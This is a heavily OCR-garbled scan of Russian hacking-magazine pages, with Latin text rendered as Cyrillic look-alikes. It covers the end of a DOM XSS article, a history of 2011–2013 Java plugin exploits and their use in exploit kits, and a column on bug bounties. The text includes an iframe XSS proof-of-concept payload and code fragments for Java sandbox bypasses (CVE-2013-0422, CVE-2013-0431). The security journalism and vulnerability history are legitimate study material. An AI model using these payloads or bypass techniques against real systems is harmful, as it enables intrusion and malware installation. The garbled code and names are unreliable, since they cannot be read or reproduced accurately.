Х55'ка вот здесь, на блюдечке. Но нет, есть проблема — 
проверки рагет:. 1е_Яг$ИоаЯ в функции ргосеззИп. Напря- 
мую уязвимость не проэксплуатировать — яваскрипт просто 
не дойдет до нужного места. 

Так каку страницы нет такого объекта, как рагетф, то уама- 
Эсир{вылетитна«рагет.Вгоми5егН!огу. зе ВгомизегЧАЦип);». 
Но мы можем схитрить и на нашем сайте создать страничку, 
которая будет содержать два фрейма: 


<Вт1> 

<Боду> 
<1+гате пате=" _1е_Яг${Тоаа" >< /1+гате> 
<1Фгате эгс=" Вр: / /ммм. \и1п.51%е/арр/И1$Фогу/-= 
015$ огуЕгате . П{т1 ?#<$сг1рЕ>а1еге(‘'х$5') «= 
<5сг1рЕ>" >< /1гате> 

</Боау> 

</Вт1> 


Таким образом мы создаем фрейм, к которому код 
с уязвимой страницы обратится в результате проверки «Н 
(!рагепт. те НгзНоаа)». И так как теперь некий объект уже су- 
ществует, то проверка попадает на Е|$е и функция удачно за- 
вершается, давая возможность запуститься ВОМ Х$5. 

Но и у этого метода есть свои тонкости. Например, ЕЕ 
запрещает обращаться к рагег{ с другого домена, а потому 
юзать ее, по опыту автора, можно было только против Е. 

Если тебя заинтересовала тема РОМ Х$$, то обязатель- 
но глянь другие примеры, чтобы набрать опыта: ачоо.а/ 


7\Ме! 3, аоо.а/аГама, аоо.а/ХВ\мВТ, аоо.а/р!а$9. 


ПОСЛЕСЛОВИЕ 

Возможно, повторюсь, но, подводя итоги, хотелось бы ска- 
зать, что ОМ Ва$еа Х$$ — это тот еще непонятный зверек. 
А чем больше непонятностей и тонкостей — тем больше 
багов. Особенно с учетом того, что уамазсирт все больше 
и больше «перетягивает на себя одеяло», а веб становит- 
ся все более динамичным. В общем, ученье — свет, а тво- 
рить — чудесно :). Удачных ресерчев! = 


56 


и 


ЗЛОУМЫШЛЕННИКИ 
БИ РА ЮТ. ЧЗАУА у 
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ВПЕРВЫЕ НА АРЕНЕ: САМАЯ ПОЛНАЯ-ИСТОРИЯ = 
ДЫР В ИЗВЕСТНОЙ ПЛАТФОРМЕ 


Если бы наши программы были ма- 
териальны и на них можно было бы 
вешать таблички, то плагины к брау- 


У 


зерам, такие как Адоре Назп и Адоре Владимир Трегубенко 


{тедибепко_у у@.бу 


РОР, несомненно, были бы достойны 
вывески «Вход для малвари сво- 
бодный!». Однако в последние годы 
пальму первенства в этой области 

у продукции Адоре грозится отобрать 
чауа. Попробуем разобраться в этой 
темной истории. 


так, каковы же причины такого устойчивого роста 
количества эксплойтов к Чама? Их несколько. Во- 
первых, бурное развитие мобильных устройств 
привело к необходимости писать приложения 
корпоративного уровня для разных платформ, 
и кросс-платформенная Чауа здесь подошла как нельзя 
лучше. Во-вторых, в больших компаниях на уауа пишут при- 
ложения для работы систем электронного документооборо- 
та, систем банковского обслуживания и так далее, причем 
имеются жесткие требования ставить УАЕ определенной 
версии. 
Многие вендоры любят использовать технологии уа\ма 
для удаленного управления серверами по технологии |РМ1. 
Кроме того, Чауа-уязвимости довольно просто эксплу- 
атируются, так как не требуют обхода ОВЕР/АЗЬВ и прочих 
механизмов безопасности. Ну и вдобавок ко всему эксплой- 
ты уама-уязвимости в подавляющем большинстве своем 


ао ЕТ @ Нскгсот 
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Чауаехрюй Васкпое Сосо! Сопда Ва Мео 5р!о{ 
С\УЕ-2011-3544 Хх 
С\МЕ-2012-0500 
С\Е-2012-0507 Хх Хх Хх 
С\УЕ-2012-1723 Хх Хх Хх 
С\Е-2012-4681 Хх Хх Хх Хх 
С\Е-2012-5076 Хх Хх Хх 
С\Е-2013-0422 Хх Хх х 
С\Е-2013-0431 Хх 
С\Е-2013-1493 Хх 

АП 6 ТИ 10 2 


Рис. 1. Эксплойты Чама в различных наборах ЕхроНРаск 


кросс-платформенные, что позволяет активно использовать их 
против целевых систем под управлением не только \ММтао\$, 
но и ОЗХи Ипих. 

Из-за этой специфики применения уауа домашние поль- 
зователи менее подвержены опасности по сравнению с кор- 
поративными. Да и саму уауа нужно устанавливать вручную, 
она не входит в инсталляционные пакеты М/пао\$ и браузеров, 
чего не скажешь о продукции компании Арре. 

До определенного момента, а именно до эпидемии 
НазйпрБаск весной 2012 года уауа-плагин для браузера был вклю- 
чен по умолчанию, но после этого инцидента Арр/е приняла ре- 
шение от него избавиться. 


МАСШТАБЫ РАЗРУШЕНИЙ 

Для оценки масштабов проблемы можно взять данные 2012 
года от антивирусной компании «Лаборатория Касперского». 
Ее сотрудники исследовали используемые в 2012 году уязвимо- 
сти. В качестве исходных данных служила информация облач- 
ной сети безопасности Казрегзку Зесищу Мемогк. Общее ко- 
личество пользователей ПЭВМ под управлением ОС \\ММпаом5$, 
согласившихся передать данные в КЗМ, составило свыше 11 
миллионов. Анализ выявил восемь уязвимостей, которые наи- 
более часто использовались злоумышленниками в эксплойт- 
паках. Пять из них содержалось в ПО Огасе уауа УВЕ, три остав- 
шихся находились в продуктах Адобе — две в Назй Р!ауег и одна 
в РОЕ Веааег. На графике (см. рис. 2) показано процентное со- 
отношение пользователей, которые подвергались риску зара- 
жения вредоносным ПО через эксплуатацию уязвимостей чуама. 
Далее будут кратко описаны уязвимости Чама, наиболее широко 
используемые в 2012 и начале 2013 года. 


СУЕ-2012-0507 
Уязвимость С\Е-2012-0500 не снискала особой популярности 
у злоумышленников. Даже в составе Мщазр!ой ее эксплойт 
идет в разделе \/Лпао\м$, тогда как все остальные послед- 
ние эксплойты проходят по категории Ми №, то есть кросс- 
платформенные. Поэтому сразу переходим к С\Е-2012-0507. 
Впервые рабочий эксплойт для нее появился в продукте 
птийпку САМУА$ еще 7 марта 2012 года. Сама уязвимость 
на тот момент уже была закрыта в рамках критического об- 
новления от Огабе от 14 февраля 2012 года. В конце марта 
эксплойт этой уязвимости появился в обновленном Васкпое 
Ехр!ой КЁ версии 1.2.3. Уязвимость скрывается в реализации 
класса АюписВеТегепсеАггау, в которой происходит невер- 
ная проверка на принадлежность к типу ОЦес(], что в конеч- 
ном итоге позволяет выполнить специально подготовленный 
апплет или класс за пределами песочницы УВЕ. 29 марта 
2012-го появился публичный эксплойт для С\Е-2012-0507 
в составе Мщазр!ой Егатемогк. Ко всему прочему он кросс- 
платформенный и срабатывает в среде ОС \\ММпаом/$, Ипих, 
Зоап$ и ОЗ Х. Последняя особенно интересна — для нее за- 
метно увеличилось число вредоносных программ, распро- 
страняющихся в том числе и посредством эксплуатации уауа- 
уязвимостей. 


Злоумышленники выбирают чуама! 


$7 
Мешипо Мисеаг Рпоепх РгоРаск Веаки бакига 5мее{Огапоае \МПКепое 
Хх Хх Хх Хх Хх 
Хх 

Хх Хх Хх Хх 
Хх Хх Хх Хх Хх Хх 
Хх Хх Хх Хх Хх Хх 
Хх Хх Хх 
Хх Хх Хх Хх Хх 

Хх Хх 
2 5 11 6 5 6 9 5 


Рис. 2. Статистика 
использования уязви- 
мостей Чауа 


Эксплойт из Маазр!оК выглядит похожим натот, что имеется 
в составе Наскпое, и предположительно взят именно из него. 

Первые признаки эксплуатации в «диком виде» С\Е-2012- 
0507 были замечены в середине марта. Именно тогда были 
отмечены многочисленные случаи инфицирования трояном 
Сагоегр на таких крупных ресурсах с высокой посещаемостью, 
как 1гуезНа.ги и Мепемз.ги. Скрипты, загружающие вредонос- 
ные уауа-апплеты, размещались на взломанных серверах бан- 
нерной сети, используемых на этих ресурсах. В конечном итоге 
после успешной эксплуатации уязвимости уауа происходил вы- 
зов функции Во\ммпоадАпаЕхес, который уже за пределами изо- 
лированной среды уауа скачивал полезную нагрузку (Сафегр) 
в каталог ЖФТЕМР% и запускал ее. 

Троян Назйбаск или НазНТаке, вызвавший в начале 2012 
года волну заражений компьютеров Арре под управлением 
О$ Х, тоже использовал С\Е-2012-0507 для своего распро- 
странения, это было после 16 марта 2012-го. До этого для за- 
ражения Назйраск использовались уязвимости С\Е-2011-3544 
и С\Е-2008-5353, обе тоже для Чама. Кстати, СУЕ-2011-3544 был 
в свое время одним из самых «пробивных» эксплойтов. Массо- 
вое заражение более чем 550 тысяч Маков стало возможным 
из-за того, что Арре проигнорировала критическое обновление 
от Огасе и не обновила свой пакет уауа для ОЗ Х. Патч от Арре 
вышел только 6 апреля. 


Лаборатория Касперского 
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— С\МЕ-2011-3544 (Октябрь 2011) 


С\Е-2012-0507 (Февраль 2012) 
С\Е-2012-1723 (Июнь 2012) 
С\Е-2012-4681 (Август 2012) 
С\Е-2012-5076 (Октябрь 2012) 


55 Взлом 


12 мая 2011 26 октября 2012 МЕ 2011-3544 Уама Арр!еЁРИто ЗсирЕЕпоте | {ауа_гПто 
Миепае! ЗсШен, 20! | Мсвае! Зстен, 201 (29 ноября 2011) 
1 августа 2011 23 февраля 2012 С\Е-2012-0507 Чама АдописВетегепсеАггау Туре | ауа_атоптсгеТегепсеаггау 
Чегоеп ЕиДег$ чегоеп ЕйДег$ \Лоайоп Уцпегаб!Иу (29 марта 2012) 
18 октября 2011 С\Е-2011-3544 Чауа ЗЕ 6 Ураае 29 
всего - 20 Уама ЗЕ 7 Ураае 1 
28 октября 2011 С\Е-2012-0500 Уама\\Меб За" Рмдт Соплтапа | {ауа_м/5_мтага$ 
Спи$ Нез, 20| НпеАгоитепт тесйоп (23 февраля 2012) 
14 февраля 2012 С\Е-2012-0500 Уама ЗЕ 6 Цраа!е 31 
С\Е-2012-0507 Уама ЗЕ 7 Уразе 3 
всего - 14 
12 июня 2012 С\Е-2012-1723 Чауа ЗЕ 6 Ураае 33 
всего - 14 Уама ЗЕ 7 Уразе 5 
НИИ июня 2012 С\Е-2012-1723 Чама АрретЕ!еа Вуесоде }ауа_уепйег Неч_ассез$$ 
ПРЕ — смей \етНегСаспе ВСЕ (9 июля 2012) 
24 июля 2012 26 августа 2012 С\Е-2012-4681 Чама 7 Арре{ ВСЕ Одау бопа\\/ | ]ауа_те17_ехес 
Чатез Рогзпам,, 0! | штпемла (27 августа 2012) 
30 августа 2012 С\Е-2012-4681 Чауа ЗЕ 6 Ураа{е 35 
Уама ЗЕ 7 Ураае 7 
С\Е-2012-5076 Уама ЗЕ 6 Ураае 37 


С\Е-2012-5088 Уама ЗЕ 7 Ураазе 9 
всего - 30 


С\Е-2012-5076 


16 октября 2012 


Эноября 2012 
Каеше - ппемиа 


Чама Арр!Е{ }ама пе17_д!а$$Я$п_ 
АуегадеАапде “ан Истр!ВСЕ | ауегаде\ 
гапдезайзиситр! (11 
ноября 2012) 
]ауа_пе17 ]ахм(22января 
2013) 


С\Е-2012-5088 Уама Арр!е{ Мепоа Нап4е ВСЕ |ауа_те17_теюоа_папа!е 
(22января 2013) 
10 января 2013 С\Е-2013-0422 Чама Арр!е{ /МХ Одау ВСЕ ]Дауа_е17_тхбеап 
ИЯ и{пем/а в а 


| 1Зянваря2013 — января 2013 ПР ЕЕЕННЫЕ СЕ. 2013-0422 (1 Чама $Е 7 Урдае 11 


18 января 2013 18 февраля 2013 С\УЕ-2013-0431 Чауа Арре  /МХВСЕ ннини 
Зесийу шфемла (25 февраля 2013) 
ЕхрогаНоп$ 
1 февраля 2013 С\Е-2013-0422 (2 Уама ЗЕ 6 Ураае 33 

С\Е-2013-0431 Чауа ЗЕ 7 Урдае 13 
всего - 50 
19 февраля 2013 всего -5 Уама ЗЕ 6 Цраае 41 
Чама ЗЕ 7 Урда 15 
28 февраля 2013 С\Е-2013-1493 УВЕ Ветое Соае Ехесийоп 
РгеЕуе - п Пем/а \Мипега Ку Одау 
4 марта 2013 С\УЕ-2013-1493 Чауа ЗЕ 6 Ураз{е 43 
всего -2 (последний публичный релиз) 
Уама ЗЕ 7 Урдае 17 


СУЕ-2012-1723 Рис. 3. Хронология 
Со времен активной эксплуатации уязвимости С\УЕ-2012- 
0507 мало что изменилось, и уама по-прежнему оставалась 
самым популярным вектором, используемым в наборах экс- 
плойтов. 5 июля 2ц012 года появилась публичная информа- 
ция об использовании С\Е-2012-1723 в наборе эксплойтов 
Васкпое, хотя сама уязвимость была найдена в середине 
июня. Уязвимость основана на коллизии в УТЛ-компиляторе. 
Для ее успешной эксплуатации необходимо создать не- 
сколько статических полей (в эксплойте их 100), затем столь- 
ко же обращений к этим полям, что приводит к задержке 
УТ-компиляции этого кода на стадии верификации. В итоге 
все эти манипуляции позволяют выполнить произвольный 
апплет в обход проверок безопасности за пределами песоч- 
НИЦЫ. 


обнаружения уязвимо- 
стей Чауа и их закрытия 


СУЕ-2012-4681 

24 июля 2012 года Джеймс Форшоу (Чатез РогзВам/ аца 
{угата) сообщил компании Гего ОБау шЩайуе (701, ммм. 
гегодаушаН\уе.сот) о новой уязвимости. Через месяц, 26 
августа, компания ЕгеЕуе (\/м/м.Игееуе.сот), а вслед за ней 
и другие разработчики антивирусного ПО обнаружили при- 
менение эксплойта этой уязвимости, являвшейся на тот мо- 
мент 7его-дау. Уже на следующий день эксплойт был внедрен 
в состав Васкпае Ехр]ой КИ. 


Майкл Ширл (Мсвае! Зстей), эксперт в области уязви- У\АВМИХС 

мостей уауа, обнаруживший такие известные уязвимости, 

как С\Е-2011-3544 и С\УЕ-2012-1723, провел собственный Вся информация предо- 
анализ эксплойта С\Е-2012-4681 и создал временный патч ставлена исключительно 
уязвимости. Огасе выпустила соответствующее обновление в ознакомительных 
безопасности только 30 августа, таким образом, пользова- целях. Ни редакция, 
тели уауа оставались беззащитны перед злоумышленниками ни автор не несут от- 
как минимум в течение четырех суток. ветственности за любой 


Эксплойт, обнаруженный ЕпеЕуе, использовался для скры- 
той установки вредоносного ПО Ро!зоп Му, относящегося 
к категории Ветодфе Аадти!хтайоп Тоо|. Как позже отметили 


возможный вред, при- 
чиненный материалами 
данной статьи. 
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специалисты компании птипку, технически эксплойт эксплу- 
атировал не одну, а сразу две уязвимости в чама. 


СУЕ-2012-5076 ИС\Е-2012-5088 
Описание уязвимостей появилось уже после выхода патча 
от Огасе. Интересно в них применение Вейесйоп Ари. 

В Чауа существует механизм защиты, который построен 
на понятии доменов безопасности. Каждый домен включает 
в себя набор классов, экземплярам которых выданы одина- 
ковые права. Для упрощения достаточно выделить два доме- 
на — тиЗеа и имгиеча. К первому относятся все системные 
классы и подписанные апплеты, им разрешены все действия 
в системе. Ко второй категории относятся неподписанные 
апплеты, которые сильно ограничены в правах (например, им 
запрещено манипулировать с файлами). При обращении к не- 
которому системному ресурсу происходит запрос к менедже- 
ру безопасности, который проверяет, есть ли у текущего пото- 
ка права для доступа к ресурсу. В определении прав доступа 
есть одно исключение — римйедеч блоки. Если некоторый код 
исполняется в контексте римйедечд блока, то его права опре- 
деляются правами вызвавшего метод аоРимПедеа кода. Таким 
образом, сущность метода сводится к обнаружению таких 
методов-классов, которые позволят выполнить вредоносный 
код (обычно это код отключения менеджера безопасности) 
в римедеа блоке. Так как такие методы недоступны для пря- 
мого вызова, для решения этой проблемы используется 
ВеНесйоп АР! (в совокупности с некоторыми другими трюка- 

и). ВеНесйоп АР! в чем-то похож на АТТ! в С++ и позволяет 
получать полную информацию о классах и их членах в гипйте. 

Более подробно об уязвимостях С\Е-2012-5076 и С\МЕ-2012- 
5088 можно почитать в статье «Ме\м уауа Модшез$ м Марон... 


Мо 0 дау$ 11$ Ите» на сайте пПИрз://соттипйу.гар!а7.сот, 


на русском языке есть отличная статья о С\МЕ-2012-5076 от кам- 
рада пекКо на Чатаае!ар.ога. 


С\УЕ-2013-0422 

Новый, 2013 год для Ога е сразу не задался. Разработчики 
некоторых эксплойт-паков, таких как Васкпае, Соо!, Мисеаг 
Раск, Закига, сделали «новогодний подарок» для своих клиен- 
тов в виде 7его-дау эксплойта уязвимости Чауа Арр!ет УМХ Одау 
Ветофе Соае Ехесийоп (С\Е-2013-0422). По данным авторов 
вредоносного ПО, используемая ими уязвимость существует 
во всех версиях чама 7, в том числе в уама 7 Урда 10. Этот 
«подарок» вынудил компанию Огасе выпустить спустя неделю 
экстренное обновление, однако не прошло и 24 часов после 
выпуска 13 января 2013 года патча уама 7 Урда 11, закрыва- 
ющего уязвимость С\Е-2013-0422, как на одном из форумов, 
распространяющих сите\маге, появилось сообщение о прода- 
же очередного 7его-Чау эксплойта для уама. Продавец запро- 
сил за эксплойт 5000 долларов и пообещал продать его толь- 
ко двум первым «счастливчикам». И покупатели не заставили 
себя долго ждать. Кстати, подобное уже случалось — не далее 
как 16 октября 2012 года компания Огабе выпустила патчи уауа 
7 Чраае 9 апа Чама 6 Чраате 37, через несколько недель в про- 
даже появился гего-Аау эксплойт, по всей видимости и ис- 
пользующий С\Е-2013-0422, «пробивающий» уауа 7 Урда 9 
(но не затрагивающий чама 6). 

Сотрудник компании тптипйу Эстебан Гильярдой (ЕеБап 
СиШагаоу) сделал отчет с подробным анализом уязвимости, 
ее суть сводится к тому, что при помощи метода сот.зип. 
лпх.трбеапзегуег.МВеапт{апНатог.ИпаС!аз$ можно получить 
ссылку на экземпляр любого класса (например, запрещенно- 
го к использованию в апплетах без разрешения пользовате- 
ля). Но есть одна маленькая проблема — у этого класса нет 
публичного конструктора. Обходится это при помощи класса 
сот.5ийп.тх.трбеапзегуег.ллхМВеап$егуег, у которого есть 
публичный конструктор, а также метод де МВеапт$апнатог, 
позволяющий получить ссылку на сот.зип.дтх.тбеапзегуег. 
МВеапт${апйаюг. 

Таким образом, весь эксплойт умещается в паре строк кода 
(дальше можно получать ссылки на любые классы и произво- 
дить операции в обход ограничений безопасности): 


Замах .тападетеп* .МВеап5егуег т$ = сот. зип.) тх. += 


тбеапзег\уег. ЭмхМВеап$егуег .пемМВеап$егуег ("е5{", + 
пу11, пи11, гие); 
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сот. зип. ]тх.тбеапзегуег.МВеапТпФап1афог т1 = <= 
((сот. зип. тх.тбеапзегуег. ЭтхМВеап5егуег)т$) . = 
зе{МВеапТп{ап1афог(); 

С1а$5 с1а7х = ш1.ИпаС1а$5$ ("5оте.гез{г1сЕ ед. с1а$$ . = 
Реге", (С1аз51оа4ег)пи11); 


Между прочим, именно С\Е-2013-0422 использовал в каче- 
стве одного из своих векторов распространения (помимо уяз- 
вимости РОЕ) вредоносный загрузчик Миике. 


СУЕ-2013-0431 
В конце января исследователь безопасности Адам Говдяк (Адат 
Сом ак) из компании Зесигйу Ехрюгайоп$ опубликовал инфор- 
мацию об обнаруженной им новой уязвимости. Как известно, 
в декабре прошлого года в уама 7 Ураае 10 были введены на- 
стройки безопасности, предусматривающие четыре уровня: 
[ом, Медит, Нор, \егу Нюп. В частности, при выборе \егу Нюп 
запрещается выполнение любого неподписанного уауа-кода. 
Однако реализация уровней безопасности не принимала во 
внимание, что уауа-апплеты могут быть созданы с использова- 
нием сериализации. Это можно сделать с помощью следующего 
НТМЕ-тега: <арр!етобес!="ВаскВох.зег">. Данные В!аскВох.зег 
могут быть легко созданы с использованием следующего кода: 


В]1аскВох Б=пем В1ТасКВох(); 

ВуфеАггауди ри 5 Егеат Бао$ = пем += 
Вуфедггауди ри {5$ {геат(); 

ОБ] ес*ОиЕри*5Егеат оо$=пем ОБЗес*Оири*5{геат(Бао$); 
005.мг1ео6Зесе(Ь); 

Е11еОчрич*5геат +о$=пем Е11е0и ри 5$геат--> 
("В1асКВох.5ег"); 

+05 .мг1е(Бао$з.фоВу{еАггау()); 

Фо5.с105е(); 


Указанный метод может быть успешно использован для за- 
пуска неподписанных уауа-апплетов в среде ВЕ 7 Ураае 11 не- 
зависимо от выбранного уровня безопасности в панели управ- 
ления уауа. Данная уязвимость получила номер С\Е-2013-0431. 

Из последних инцидентов сее использованием можно отме- 
тить распространение троянской программы Спаех. По данным 
компании ЕЗЕТ, атака осуществлялась через спам-сообщения, 
которые содержали информацию о популярной в СМИ теме — 
введении разового налога для банковских счетов клиентов 
кипрских банков. Само письмо выглядело таким образом, 
как будто оно было отправлено от телекомпании ВВС. Ссылка 
в сообщении вела на веб-страницу ПЦр://до-ту.ги/сурги$_пем. 
Мир, с последующим перенаправлением на Васкпое Ехр!ок КК. 
В результате успешной эксплуатации уязвимостей, в основном 
как раз С\МЕ-2013-0431, компьютер заражался Спаех. 

Огасе выпустила патч Чама 7 Ураае 13, закрывающий эту 
уязвимость, 1 февраля. Критическое обновление устраняло 50 
проблем безопасности в УВЕ. Среди них было финальное ис- 
правление уязвимости С\Е-2013-0422, на самом деле бывшей 
результатом использования двух уязвимостей, одна из которых 


У 


была закрыта уама 7 Урда 11, а другая — Чама 7 Чраае 13. Компа- 
ния Огасе 20 февраля в дополнение к выпущенному в начале месяца 
ОЦраае 13 представила плановые корректирующие выпуски уауа ЗЕ 7 
Ораа{е 15 и Чауа ЗЕ 6 Чраа{е 41, в которых было устранено пять новых 
проблем с безопасностью. 


С\УЕ-2013-1493 

Эксплойт уязвимости был обнаружен в конце февраля в «диком виде» 
компанией РНгеЕуе при помощи технологии МаМаге Рг4есйоп Сюоца 
(МРС). В отличие от других распространенных уязвимостей чуа\ма, где 
менеджер безопасности обходится простым путем, здесь использо- 
валась произвольная запись и чтение памяти процесса виртуальной 
машины чуауа. После срабатывания уязвимости эксплойт искал адрес 
памяти, в котором содержалась информация о внутренней структуре 
виртуальной машины, в том числе о статусе менеджера безопасно- 
сти, а после перезаписывал эту часть памяти нулями. 

После успешной эксплуатации загружалась и запускалась вредо- 
носная программа МсВа4 в виде файла $\спо$.]ра с того же сервера, 
где находился и вредоносный ЧАР. Эксплойт не отличался высокой 
стабильностью работы, поскольку пытался перезаписать значитель- 
ный объем памяти. В результате в большинстве случаев после атаки 
загрузка происходила, но виртуальная машина уауа завершалась 
с ошибкой и не могла запустить загруженный файл. 

Специалисты компании выяснили, что уязвимость работает в бра- 
узерах, использующих плагин чуама версии 6 с обновлением 41 и Чама 
версии 7 с обновлением 15. На тот момент пользователям рекоменлдо- 
валось отключить выполнение плагинов уама или сменить настройки 
безопасности уама на \егу НОП и не запускать недоверенные апплеты. 

Компания Огасе 4 марта выпустила внеплановые обновления уауа 
ЗЕ 7 Урда 17 и чама ЗЕ 6 Урдае 43 с исправлением проблем без- 
опасности С\Е-2013-1493 и С\МЕ-2013-0809. 

Согласно официальной информации от ОгасЕ, уауа ЗЕ 6 Урда 41 
должен был стать последним публичным апдейтом в ветке Ш0Кб, под- 
держка которого, начиная с 20 февраля 2012 года, должна была про- 
исходить только по каналам Огасе Мейте Зиррой на платной основе. 
ЧОК7 тогда стала бы единственной публично поддерживаемой веткой 
в линейке ОК, вплоть до выхода 0К8. После выхода у0К8 О0К7 бу- 
дет поддерживаться еще некоторое время, а затем также уйдет из пу- 
бличной поддержки где-то в районе июля 2014 года. Тем не менее 4 
марта выходит уауа ЗЕ 6 Урда 43, и именно он стал последним пу- 
бличным патчем для шестой ветки уама. Хоть Огасе и пытается таким 
образом принудить переходить на ОКТ, в целом корпоративный сек- 
тор не горит желанием это делать, так как многие их продукты разра- 
ботаны под старые версии ОК. 


ЗАКЛЮЧЕНИЕ 


В начале марта одна из кибергруппировок выпустила 
эксплойт-пак с названием Мешщипо. Этот пак на данный 
момент использует только две уязвимости — уама СУ\УЕ- 
2012-1723 и С\МЕ-2013-0431, что нехарактерно для Ехрой 
КИ, куда обычно входят эксплойты к как можно большему 
количеству ПО. Создатели обещают добавить также экс- 
плойты на Назй и РОЕ-плагины к браузеру, однако, с их 
слов, суммарный пробив и так составляет 86%. Естествен- 
но, что на практике количество установок вредоносного 
ПО будет на порядок ниже из-за отлова антивирусами, тем 
не менее эти цифры позволяют увидеть общую картину ис- 
пользования уязвимых версий УВЕ. 

Общий вывод такой: в течение 2012 года и далее ин- 
тересы злоумышленников сместились с использования 
эксплойтов для плагинов браузеров от Адоре (НазН Рауег 
и РОР) в сторону использования уязвимостей уама. Соглас- 
но появлению все новых описаний проблем безопасности 


от компании Зесищу Ехрюгайоп$, доступных на их сайте 
‚ ситуация в ближайшее 
время не изменится, компании Огасе и АррЕе будут вынуж- 
дены все время подлатывать «дыры» в своих реализациях 
виртуальных машин уауа. Сводную таблицу хронологии 
обнаружения уязвимостей уама и их закрытия можно уви- 
деть на рисунке (см. рис. 3), почти все из них есть в составе 
Маазр!ой Егатемогк (кроме С\Е-2013-1493). 
В свете этого хочется дать следующие рекомендации: 
обычным пользователям — не нужна вам эта чама, 
не ставьте ее вообще, одной «дырой» в системе будет 
меньше; 
сисадминам крупных контор — по максимуму ограни- 
чивайте список сайтов, откуда могут запускаться уама- 
апплеты, у пользователей корпоративные приложения 
должны запускаться только с серверов самой организа- 
ции. 2= 


эЭ9о 


Взлом 


КОЛОНКА 
АЛЕКСЕЯ 
СИНЦОВА 
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СВОМОЗОЧВАОСМО: 
ВОС ВОУМТУ 


Крупные вендоры и ИТ-компании все чаще прибегают к краудсорсингу для 
поиска уязвимостей. И если посмотреть на эту тенденцию глазами «исполни- 
теля», то все кажется просто и очевидно: сделал работу — получил награду. 
Но гораздо интереснее взглянуть со стороны организатора... 


@ сыркрадуется за 
гемгага от МоК!а — 
телефон, желтый 8) 


ПРОБЛЕМЫ 

Разумеется, на каком-то этапе зрелости компания начинает 
осознавать те трудности, которые у нее есть с разработкой 
и ИБ. Они у всех примерно одинаковые: в больших компаниях 
очень много различных команд разработчиков, много отде- 
лов, много проектов — мелких и больших, которые раскиданы 
по различным площадкам. Даже если в компании есть ЗОЕС- 
процессы, не всегда можно уверенно сказать, что все проекты 
были ими покрыты в прошлом (например, есть много старых 
проектов, которые были выведены в продакшн до возникнове- 
ния модных течений) или какая-то команда где-то не схалту- 
рила. При этом не забываем про всякие аутсорс-проекты — 
многим отделам нужны краткосрочные проекты, нагружать 
команды, которые заняты чем-то важным, нет возможности, 
поэтому обращаются к аутсорсерам... В итоге у такой компа- 
нии, особенно со временем, получается гигантская инфра- 
структура, куча сервисов и проектов, которые не то что попен- 
тестить — тяжело даже просто пронумеровать и перечислить. 
Поэтому вопросы безопасности сложно решаемы, ведь ко- 
манда секурити маленькая, там людей намного меньше, чем 
уН&О. Как же со всем этим справиться? 


КРАУДСОРСИНГ 
Краудсорсинг — перенос конкретной работы на неопреде- 
ленное множество исполнителей-добровольцев. ИТ-секурити 
столь раскрученная и популярная тема, что в мире найдется 
много энтузиастов-добрых-хакеров, которые любят практико- 
вать скилы и ломать сайты за идею. Вполне очевидно, что если 
использовать их интерес, а также немного мотивировать их, 
то можно частично решить те проблемы, которые были озву- 
чены: 

1. Вайтхаты сами будут искать ресурсы, которые вышли из- 
под контроля, и таким образом можно охватить неплохую 
часть ресурсов. 

2. Вайтхаты будут искать уязвимости, причем массово, 
при этом количество участников процесса позволит покрыть 
большую часть выпущенного кода. 


Почему частично? Потому что, к сожалению, они не могут на- 
ходить действительно сложные вещи, а, как правило, ограничи- 
ваются шаблонными проблемами, но зато массово, массово... 

Результаты их работы будут контролироваться и управлять- 
ся секурити-командой компании, что позволит легко иден- 
тифицировать такие ситуации, как аирйсае или Та!5е розЦме. 
При этом в зависимости от подхода траты на это будут намного 
ниже, чем если бы пришлось нанимать пентестеров или людей 
в штате для такого же покрытия за те же сроки! Выгода очевид- 
на. Но поговорим о мотивации, чтобы понять, как можно кон- 
тролировать поток. 


МОТИВАЦИЯ 
В зависимости от возможностей и политики компании пути мо- 
тивации масс могут быть разными. Рассмотрим классику. 


ЗАЛ СЛАВЫ 

Наиболее базовая и популярная схема. Если некто нашел уяз- 
вимость и добропорядочно сообщил о ней владельцу, то владе- 
лецна специальной «доске почета» — страничке в интернете вы- 
весил имя, контакты или место работы героя. Соответственно, 
это самая дешевая для владельца схема. Для багхантеров же 
это имеет смысл — твое имя на сайте адорбе.сот или псго$0#Н. 
сот, черным по белому, ЧСВ же. А кроме того, для многих это 


ХАКЕР 05 /172/ 2013 


[У Уапдех.Сотрапу — Най, х 
= > С СП сотрапууапдехсотизесийу/па 
Зеагсн |тадез \Мео 


Уапдех 


Согрогае тИогтафоп — ТНЕУАНОЕХ ВИС ВООНТУ 
Уапдех Тодау 
Мападатеги Тезт 


Узпфех Низогу 


Нан огРате 


Твапк уси ог пера и$ 
у5ег5. 


ОсюоБег-Обесетьег 


[пмезтог Веабсле 
Епапста! Ве! 


ОМес гезеагсп 1а6 
Уи Козида 


Тотаспем Емдепй, Ро$й 
Тесппоюдез 


дехеу Этом. МоКа 


РТ Кати Зем! (@катизем!) 


попытка заявить о себе другим, например в Гугле на собеседо- 
ваниях в секурити-команду часто спрашивают: «А вы в зале сла- 
вы у нас висите?». Да и вообще, к резюме это будет неплохое 
приложение, так что не ЧСВ единым — практическая ценность 
у данной стены есть. 


КОНКУРСЫ 

Кроме того, есть возможность организовать конкурсы с побед- 
ными местами и призами за них. Да, призы будут стоить денег, 
зато количество участников с полезным контентом перевесит 
в целом стоимость призов. Разумеется, это сложно делать 
на постоянной основе, но что можно отнести к плюсам — это 
контролируемый процесс и контролируемая нагрузка. Хотя эти 
плюсы могут быть сомнительны, но чаще всего это может быть 
либо на неофициальной основе, либо как проба пера. 


ПОСТОЯННЫЕ ВЫПЛАТЫ 
Следующая возможность — организовать бюджет и на основе 
неких правил выплачивать за определенный тип работы вполне 
определенные деньги. Практически фиксированным образом, 
за определенные уязвимости и за определенные достижения 
компания выплачивает гарантированные деньги. Данный метод 
хорош, если мы относительно уверены в наших возможностях, 
поэтому при таком варианте сильно ограничивают $соре — 
множество ресурсов, которые входят в данную программу. 

На самом деле мотивация бывает разная, но работает 
любая из них. Многие готовы искать уязвимости за «спасибо 
на стене». Не верите — посмотрите сюда: 


. Мсго$ой —{есппе.тисго$ой.сот/еп-из/5есигКу/ 
сс308589.азрх 

. Адоре — адобе.сот/зирро\/5есиу/биНейт$/ 
зесигЦуаскпомМедатетт$. Пт! 

“ _ \М(ег— (рз://\мЩег.сот/абоц/зесиг Ку 

. Аеа На — ИЦръ://ассе$$.ге4па{.сот/кптомМедае/ 
агисе$/66234 

’ ЗАР — 5сп.зар.сот/40с$/0О0С-8218 


